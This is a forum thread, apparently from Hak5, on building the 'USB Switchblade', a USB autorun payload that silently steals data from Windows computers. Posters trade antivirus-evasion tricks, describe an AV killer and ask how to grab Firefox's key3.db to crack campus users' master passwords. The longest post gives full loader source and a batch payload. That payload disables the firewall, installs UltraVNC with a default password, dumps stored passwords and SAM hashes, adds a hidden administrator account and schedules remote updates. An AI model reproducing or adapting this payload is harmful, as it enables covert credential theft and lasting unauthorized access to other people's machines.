USB Switchblade Development

[renegadecanuck]

G-Stress, it may be possible, but I dont know of any programs that does that silently.

Killzone, only problem is that when the sys admin logs in, it wont run hte autorun, and AFAIK, there is no coding that can execute at login menu, which would be nessesary to get something to run at login.

[CaveMan]

hak5 should sell switchblades

i would probably order one :P (probably)

[wrxratd]

how do i go about installing MaxDamage's Solution on my kingston data traveler 1gb as i only see a sandisk version (with U3) is it something thats able to be done or do i have to use Amish's Solution

[renegadecanuck]

If your kingston is U3 compatible, then you'll have to find a method to update the kingston u3 portion... Sorry, other than that, can't help you.

[G-Stress]

G-Stress, it may be possible, but I dont know of any programs that does that silently.

Killzone, only problem is that when the sys admin logs in, it wont run hte autorun, and AFAIK, there is no coding that can execute at login menu, which would be nessesary to get something to run at login.

Thanks man, I'm just glad someone finally at least commented on this. I thought more people would find it interesting, but oh well :) Thanks for the reply though.

[jabbilabbi]

Is there a version of DLSS's technique floating around that doesn't get picked up by some/all AV programs?

Or, can someone provide an updated version of DLSS's mailpv.exe?

[VaKo]

Just tested Amish's build on vista build 5728 (the rtm1 build), it can get the product keys, but nothing very little else. Will test DLSS's version asap.

[jabbilabbi]

Nice one VaKo!

Yea.. I got fed up with Vista Beta or else I would have given it a go.

Did anybody find out which Payloads get picked up by what AV/Security Systems?

Can ppl with this info update the wiki please?

Thanks a bunch.

[boristsr]

Is there a version of DLSS's technique floating around that doesn't get picked up by some/all AV programs?

Or, can someone provide an updated version of DLSS's mailpv.exe?

has anyone tried using UPX on the executables? (sorry if this has been answered already, but this is a HUGE thread, and i don't have time to read it all atm.)

UPX is an open source app which compresses executables, so, provided the executable hasn't already been UPX'd, should have a different signature to what the AV's are looking for.

**edit** sorry, did a search, it appears they already are compressed.

[moonlit]

Can you UPX a UPXd UPXd UPXd exe? ;)

[boristsr]

Can you UPX a UPXd UPXd UPXd exe? ;)

no, because UPX will recognise when UPX has UPX'd an exe. :P

[jabbilabbi]

I guess DLSS is using a newer version of that exe and it wasn't compressed...

u think this is possible?

[jabbilabbi]

for the time being I've updated the wiki to include a Issues heading for DLSS's version

[jabbilabbi]

"if you have any problems just drop me an email at kapowdude {at} gmail {dot} com"

"http://kapowdude.googlepages.com/MAD1.zip"

Hmm.. this guy's technique is no where to be found and his email account bounces.

LOL, he is .... gone.... back to his secret black hacker hole.

[boristsr]

I guess DLSS is using a newer version of that exe and it wasn't compressed...

u think this is possible?

yeah. UPX does offer several compression settings and so on, so it's possible for a single version of a program to have several different "flavours" i suppose, uncompressed, stripped, stripped and minor compression, stripped and medium compression etc. hopefully AV's don't easily detect changes like that and therefore it should allow a bit of headroom with reguards to getting around AV's.

[therian16]

Instead of trying to encrypt our exe's and dll's, can we figure out a way to suppress (read disable) av's altogether? I thought I read a post about killing processes from command script somewhere while doing research for this program but didn't look into it.

Just to add my little piece to this project, I came across this little gem called firepassword that will get the username/password of everything firefox is told to remember. The only limitation is that the program cannot bypass master passwords. Installation is simple just copy the 3 files to WIPCMD and add this line to your go.cmd.

FirePassword.exe >Documentslogfiles%computername%.txt

I edited my go.cmd so a new folder was created just for this txt file. If anyone needs this more explained I can post the changes I made.

Here's the link for that program

http://nagmatrix.50webs.com/article_firepassword.html

Another idea I implimented was changing the logfile location to WIPlogfiles. I think it is better for the social engenering aspect because if your having someone open your Switchblade to saveget something, they go to documents and see logfiles folder. Anyone curious what is in there? this way it's already in one (hidden) folder and if they find WIP your already in trouble.

let me know what you think sorry for the long post

Next personal project: cracking wand.dat from Opera. Anyone wanna help? (Supposedly Uncrackable)

[DLSS]

Is there a version of DLSS's technique floating around that doesn't get picked up by some/all AV programs?

Or, can someone provide an updated version of DLSS's mailpv.exe?

has anyone tried using UPX on the executables? (sorry if this has been answered already, but this is a HUGE thread, and i don't have time to read it all atm.)

UPX is an open source app which compresses executables, so, provided the executable hasn't already been UPX'd, should have a different signature to what the AV's are looking for.

**edit** sorry, did a search, it appears they already are compressed.

UPX still gets detected .. sorry , i'm still looking for a tool to make it undetectable ...

for the time being I've updated the wiki to include a Issues heading for DLSS's version

tnx m8

[anyedie]

are people having trouble with antivirus? im still using Max's build with the encrypted .exe's and ive had no troubles. except with zone alarm. thats the only one.

[moonlit]

I'm currently working on an AV killer, so far it wipes out AVG and Avast until next reboot, it gets half of NOD so far but that's not finished... will post results here soon :)

Edit: Could be fixed to kill them perminantly or restart them after the deed is done but I only just thought of that ;)

Edit2: Melodic and Kainchick/Kainchick's laptop get props for being my testers :)

[therian16]

Great job moonlit, if you need someone else to do some testing send me the package and I'll test the av's I have.

[therian16]

I need some help from a dos coding Guru out there. here's the situation:

I have added the firepassword I mentioned earlier to my payload, works great but I need to expand on it.

In the situation there is a Master password set for firefox , Firepassword comes up with an error saying it wants master password. I need to be able to copy the file key3.db from

C:Documents and settings%username%Application dataMozillaFirefoxProfiles{random}.default

(random meaning always different)

and crack it later so I can feed the master password to firepassword.

Progress so far:

I can change to the directory using this .bat

c:

cd docume~1%username%applic~1mozillafirefoxprofiles

cd *.default

What I want is to be able to get the key3.db from this location to my Switchblade keeping in mind the drive letter changes depending on the computer

I realize everyone uses different Master passwords but I'm on campus so all the passwords are the same campus wide and I can just enter the master password into firepassword and get the info from then on.

only idea I have come up with so far is setting drive letter of Switchblade to a variable then just: copy key3.db %variable%mylogfiles

any ideas how to accomplish this?

[pseudobreed]

Ive been playing around with this cruzer drive ever since I saw it on Hack a Day.

Here is my version...

First of all, all files have the system and hidden attributes set. Most non savvy computer users have the hide system files checked by default. This adds discretion to the files.

Second of all, the files are located in the RECYCLER folder. This way if a user does see a hidden system folder, they would assume it's just the recycle bin on the drive (Even though removable disk do not have such a thing).

Cruzer Loader (Download):

Files Included:

- cruzer-autorun.iso

- LPInstaller.exe

The cruzer-autorun.iso only holds two files. One being the autorun.inf

[autorun]

open=autorun.exe

And, the other being an exe file. I really didnt like the vbscript way considering it pops up a console window for about a second. I just compiled the vbscript into an exe file using VB.

Private Sub Form_Load()

  Dim FSO As New FileSystemObject

  Dim objDrive As Drive

  

  For Each objDrive In FSO.Drives

    If FSO.FileExists(objDrive.DriveLetter & ":autorun.bat") Then

      ChDrive objDrive.DriveLetter & ":"

      Shell objDrive.DriveLetter & ":autorun.bat"

      Set objDrive = Nothing

      Set FSO = Nothing

    End If

  Next

  

  Unload Me

End Sub

This way when the CD autoruns, there is no console flash. It's nice and discreet. All that file does is look for autorun.bat on a disk, assumes it's the USB drive and executes it.

Cruzer Payload (Download):

The payload begins with the autoexec.bat

:: Do not show commands to console

@echo off

setlocal



:: Open Explorer (Only works from My Computer View, not Autorun Dialog Box)

::explorer %CD%



:: Dump Directory

set dumppath=RECYCLERDUMP%computername%%username%



:: Make Directory from Computer NameUser

mkdir %dumppath%



:: Apply Attributes Hidden and System

attrib +h +s RECYCLERDUMP



:: Turn Off Windows XP Firewall

netsh firewall set opmode disable



:: Setup VNC

regedit /s RECYCLERultravnc.reg

mkdir "%ProgramFiles%UltraVNC"

xcopy RECYCLERUltraVNC "%ProgramFiles%UltraVNC" /D /E /C /I /H /F /R /Y

"%ProgramFiles%UltraVNCwinvnc.exe" -reinstall



:: Set Services to Auto

RECYCLERnircmd.exe service auto lanmanworkstation

RECYCLERnircmd.exe service auto lanmanserver

RECYCLERnircmd.exe service auto winvnc

RECYCLERnircmd.exe service auto remoteregistry



:: Start Services

RECYCLERnircmd.exe service start lanmanworkstation

RECYCLERnircmd.exe service start lanmanserver

RECYCLERnircmd.exe service start winvnc

RECYCLERnircmd.exe service start remoteregistry



:: Enable ADMIN$ Share

RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters" "AutoSharewks " "1"



:: Port Probe

RECYCLERports.exe /sxml %dumppath%ports.xml



:: Current Process List

RECYCLERprocess.exe /stab %dumppath%process.txt



:: Internet Explorer History

RECYCLERiehv.exe /sxml %dumppath%iehistory.xml



:: Internet Explorer Passwords

RECYCLERiepv.exe /sxml %dumppath%iepasswords.xml



:: Email Client Passwords

RECYCLERmailpv.exe /sxml %dumppath%mailpasswords.xml



:: Messenger Client Passwords

RECYCLERmspass.exe /sxml %dumppath%messengerpasswords.xml



:: Network Passwords

RECYCLERnetpass.exe /sxml %dumppath%networkpasswords.xml



:: Protected Passwords

RECYCLERpspv.exe /stab %dumppath%protectedpasswords.txt



:: Services

RECYCLERserviwin.exe /stab /services %dumppath%services.txt



:: IP Info

ipconfig /all > %dumppath%lan.txt



:: Get External IP

RECYCLERwget.exe http://whatismyip.com

ren index.html wan.html

xcopy wan.html %dumppath% /H /C /Y

del wan.html /q



:: SAM Dump

:: fgdump will only dump to call folder

:: run fgdump, copy pwdump file to dumppath, then delete original

RECYCLERfgdump.exe -c -s -r -h 127.0.0.1 -u %username% -p * >> 127.0.0.1.pwdump.log

xcopy *.pwdump %dumppath% /H /C /Y

xcopy 127.0.0.1.pwdump.log %dumppath% /H /C /Y

del *.pwdump /q

del 127.0.0.1.pwdump.log /q



:: Add User

net user SUPPORT password /add /fullname:"CN=Microsoft Corporation,L=Redmond,S=Washington" /comment:"This is a vendor's account for Support"

net localgroup Administrators SUPPORT /add

net accounts /maxpwage:unlimited



:: Hide SUPPORT from Windows XP Login Screen

RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" "SUPPORT" "0"



:: Delete MS's Support Account

net user SUPPORT_388945a0 /delete



:: Local Share's

net view 127.0.0.1 > %dumppath%shares.txt



:: Copy Files for Remote Updates

xcopy RECYCLERblat.dll %windir%system32 /H /C /Y

xcopy RECYCLERblat.exe %windir%system32 /H /C /Y

xcopy RECYCLERblat.lib %windir%system32 /H /C /Y

xcopy RECYCLERinstsrv.exe %windir%system32 /H /C /Y

xcopy RECYCLERnircmd.exe %windir%system32 /H /C /Y

xcopy RECYCLERrunsaver.ini %windir%system32 /H /C /Y

xcopy RECYCLERrunsaver.scr %windir%system32 /H /C /Y

xcopy RECYCLERsched.bat %windir%system32 /H /C /Y

xcopy RECYCLERsrvany.exe %windir%system32 /H /C /Y

xcopy RECYCLERunrar.exe %windir%system32 /H /C /Y

xcopy RECYCLERupdate.exe %windir%system32 /H /C /Y

xcopy RECYCLERwget.exe %windir%system32 /H /C /Y



:: Schedule Update

:: Parse Time

for /f "tokens=5-8 delims=:. " %%a in ('echo/^|time') do (

  set hh=%%a

  set mn=%%b

  set ss=%%c

  set ds=%%d

)



:: Add 5 Minutes

set /a mn=mn+5



:: If Min is less than 10, add 0 to front

if %mn% LSS 10 set mn=0%mn%



:: Sched Next Update

at %hh%:%mn% %windir%system32sched.bat



:: Done

It's all commented, so Im not going to explain what it all does.

In short, it grabs passwords, history, share, sam, installs vnc on port 5900 with password 'password', adds a SUPPORT administrator account, places files in the system32 directory and schedules to be auto updated every hour. This way I can add more to the payload to the future. I also used fgdump instead of pwdump considering it doesnt send lsass.exe into a bezerk mode forcing a shutdown.

Those of you who do not have a Cruzer, you can download the USB payload. The only difference is there is a root autorun.inf that will call the autoexec.bat and open up a windows explorer at the drives root.

In the future I will want to add files that can pass through the AV. For now, I have Trend Micro and AntiVir and Trend Micro is the only thing that picks up the mailpv file. I would also want to add a keylogger that will auto email every hour using blat while it makes it's updates. Right now Im working on a way to setup a NAT to NAT connection so I dont have to worry about port forwarding the router on the remote machine when attempting to use UltraVNC. And, some type of discreet alert so that I know the dumping is complete (Maybe flash the clock on the system tray or something).

I also need to write something that parses all the dump files into a nice friendly interface. It would be much easier instead of having to open xml/text files. Now to use php for ease or vb for portability.

*Edit for spelling

**Edit to mention fgdump

[pseudobreed]

@moonlit

I found the best way to stop most AV's is just stop the service. Once the service is stopped, bring over the questioned files.

You can always set the service to disabled and not have to worry about it coming back up on startup.

I know Trend Micro and AntiVir both work this way. Since the service is under a system account, once it's stopped it kills the process too.

@therian16

You can use MD's vbscript.

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set colDrives = objFSO.Drives

For Each objDrive in colDrives

If objFSO.FileExists(objDrive.DriveLetter & ":wipcmdgo.cmd") Then

strPath = objDrive.DriveLetter & ":wipcmd"

strcmd = """" & strPath & "" & "go.cmd" & """"

CreateObject("Wscript.Shell").CurrentDirectory = strPath

CreateObject("Wscript.Shell").Run strcmd, 0, False

End If

Next

You pretty much have to tell windows to find a file. Once it's found, assume that is your drive. The key is to have a unique file to search for. Or, at least in a unique place.

It's the samething I did in the loader except I made it an exe in VB so I didnt have to see the console flash.

[renegadecanuck]

pseudo, I'm currently working on a U3 Launcher compliant loader (for those who dont need to be descreet and want to maintain U3 features such as Spyke, etc). Is it alright with you if I use your exe as teh groundwork? (My coding language isnt the best).

[pseudobreed]

Yeah, I dont care. That's why I posted the source. That and I didnt want anyone thinking I hid something in the exe.

Just keep the Guy Fawkes Mask icon going. =)

I didnt comment the exe file at all, if you have any questions just ask.